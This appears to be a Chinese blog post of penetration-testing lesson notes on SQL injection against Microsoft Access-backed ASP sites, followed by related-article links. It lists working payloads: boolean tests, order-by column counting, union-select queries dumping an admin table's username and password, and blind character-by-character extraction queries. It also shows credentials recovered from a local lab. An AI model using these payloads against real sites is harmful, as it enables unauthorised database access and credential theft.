第二课SQL注入之access下

最新推荐文章于 2022-02-20 19:00:31 发布
最新推荐文章于 2022-02-20 19:00:31 发布
阅读量974 收藏
点赞数
分类专栏: WEB安全&渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dianyanxia/article/details/86567617
版权
  • access注入攻击片段-联合查询法
  1. 判断注入及猜字段数

' and 1=1 and 1=2

and 1=1  页面正常

and 1=22 页面错误

数学逻辑运算符 或 且 非

or and xor

真且真 真

真且假 假

真或假 真

 

Order by 22

22代表查询的表名的数目

 

 

2.猜解表名

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

 

3.猜解列名

union select 1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

4.猜解内容

http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,xxuser_name,4,5,6,7,8,9,10,11,12,13,14,xxpass_word,16,17,18,19,20,21,22 from admin

  • access注入工具介绍使用
  1. 明小子

2.Sqlmap

3.穿山甲

分析工具的猜解原理

 

 

  • access注入攻击片段-逐字猜解法

查表:and exists (select * from admin)

查列:and exists (select xxuser_name from admin)

 

查数据:1.确定长度 2.确定asc数据(asc编码)

and (select top 1 len(xxuser_name) from admin)=5

and (select top 1 asc(mid(xxuser_name,1,1)) from admin)=97 判断第一位

and (select top 1 asc(mid(xxuser_name,2,1)) from admin)=97 判断第二位

xxuser_name 长度为5

Xxpass_word 长度为16

 

xxuser_name=admin 第一位a 第二位d 第三位m 第四位i 第五位n
Xxpass_word=a48e190fafc257d3
说好今夜不点烟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入Access注入及原理
afei001
04-23 305
Access数据库介绍 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了MicrosoftJet Database Engine 和图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Access能够存取Access/Jet、Microsoft SQL Server、Oracle(甲骨文软件公司),或者任何 ODBC ...
Java程序员从笨鸟到菜鸟之(一百零一)sql注入攻击详解(二)sql注入过程详解...
红太阳照大地
10-25 254
在上篇博客中我们分析了sql注入的原理,今天我们就来看一下sql注入的整体过程,也就是说如何进行sql注入,由于本人数据库和网络方面知识有限,此文章是对网上大量同类文章的分析与总结,其中有不少直接引用,参考文章太多,没有注意出处,请原作者见谅) SQL注入攻击的总体思路是: 1.发现SQL注入位置; 2.判断后台数据库类型; 3.确定XP_CMDSHELL可执行...
第二课 SQL注入access
dianyanxia的博客
01-20 199
一、搭建组合            操作系统:windows Linux 目录 一、搭建组合 搭建平台:iis apache uginx tomcat 脚本格式: asp php aspx jsp cgi war py pl do js 数据库: access mysql mssql oracle db2 postsql 脚本  数据库  搭建平台  操作系统 1.a...
access的注入
D1stiny的博客
04-03 643
新手最先接触的就是手工注入,度过新手期后就会开始使用工具,等到达大神级别后会发现很多东西工具做不了,这个过程被称作返璞归真。 一.access数据库介绍 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。至于别的什么乱七...
Access数据库注入
Birdman-one的博客
12-26 333
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之Access数据库注入 -----------------------------------------------------
第二节 针对asp+access网站进行sql注入利用-01
最新发布
09-15
ASP+Access网站SQL注入利用 在本节中,我们将探讨针对ASP+Access网站的SQL注入利用。ASP(Active Server Pages)是微软公司开发的服务器端脚本环境,用于创建动态交互式网页并建立强大的web应用程序。Access是微软...
sql注入网站源码
04-09
2. **防止SQL注入**:最有效的防御方法是使用参数化查询或预编译的SQL语句。在ASP中,可以使用ADO(ActiveX Data Objects)的Command对象和参数,这样用户输入的数据不会影响SQL结构。此外,应避免使用动态SQL,尽...
手工注入常用SQL语句.txt
07-18
对于Access数据库,可以通过以下方式进行手工SQL注入: - `and (select id from MSysAccessObjects) > 0`:该语句用于检测目标系统是否使用Access数据库。 ### 3. MSSQL数据库的手工SQL注入示例 MSSQL(Microsoft ...
SQL注入漏洞测试
09-12
SQL 注入漏洞测试的原理可以分为三个部分:第一部分是了解 SQL 注入的原理,第二部分是判断能否进行 SQL 注入,第三部分是判断数据库类型及注入方法。 在了解 SQL 注入的原理部分,攻击者需要了解 SQL 注入的定义、...
第二篇:Bypass X-WAF SQL注入防御(多姿势)1
08-03
Bypass X-WAF SQL注入防御多姿势分析 通过对X-WAF的代码分析,我们可以了解到WAF的工作原理,并找到Bypass的方法。X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 ...
网络安全学习--008--SQL注入Access数据库注入详解
隔壁山上小道士的博客
02-03 1028
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Access注入漏洞详解 一:注入漏洞分析 站库分类: 1.网站分类: 静态网页: 不依赖数据库 灵活性差,制作、更新、维护麻烦 交互性较差,在功能方面有较大的限制 安全,不存在SQL注入漏洞 动态网页: asp、aspx、php、jsp等,由相应的脚本引擎来解释执行,根据指令生成静态网页。 依赖数据库 灵活性好,维护简便 交互性好,功能强大 存在安全风险,可能存在SQL注入漏洞 注:还有一种网站是伪静态的,这些网站看着是html,
详解新手如何使用sqlmap对Access数据库进行注入攻击
1匹黑马
03-06 4511
步骤1:发现是否存在注入 首先我们打开火狐浏览器,进入目标网站,随意点击几个连接,发现网站后方都是以id参数为结尾的 看见以id为结尾的,我们第一时间应该想到的就是注入,首先我们输入 and 1=1,发现网站有防sql注入系统 不要慌,问题不大!打不过我还躲不过?这时候我们尝试进行大小写绕过(绕过WAF的方式与思路很多,在这里就不一一列举了) 现在没毛病了8铁汁 我们接着输入 aNd 1=2,...
SQL注入ACCESS注入笔记
热门推荐
Y4tacker的博客
06-17 1万+
加油
Access数据库注入高级玩法
收集盒 Book box
09-06 757
author:RoGe 一,基础篇 猜解表名,这里借用啊D的语句: and exists (select * from 表名) 猜解列名: and exists (select 字段 from 表名) UNION法,在执行union之前建议进行下order b
access逐字猜解法
weiliang369的博客
02-20 467
联合查询↓ 优势:方便 快捷 缺点:兼容性相对较差。 逐字猜解法↓ 优势:兼容绝大多数注入点。 缺点:很慢。 工具所使用的语句↓ 猜字段↓--------------------------------------------------------------------------------------------------------------------------------- and exists (select * from 表名) 获取表名 and exi..
查询Access表名的Sql语句
暗淡亮点的博客
10-28 1187
SELECT * FROM MSysObjects WHERE Flags=0 AND Type=1
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQL、SQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值